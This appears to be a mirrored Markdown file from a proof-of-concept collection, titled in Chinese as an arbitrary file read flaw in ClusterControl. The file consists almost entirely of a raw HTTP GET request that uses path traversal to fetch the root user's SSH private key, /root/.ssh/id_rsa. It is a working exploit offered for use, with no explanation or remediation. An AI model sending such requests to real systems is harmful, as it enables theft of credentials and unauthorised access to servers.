mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
16 lines
385 B
Markdown
16 lines
385 B
Markdown
# ClusterControl存在任意文件读取漏洞
|
|
|
|
|
|
|
|
## poc
|
|
|
|
```yaml
|
|
GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
|
|
Host:
|
|
Accept-Encoding: identity
|
|
User-Agent: python-urllib3/1.26.4
|
|
```
|
|
|
|

|
|
|
|
 |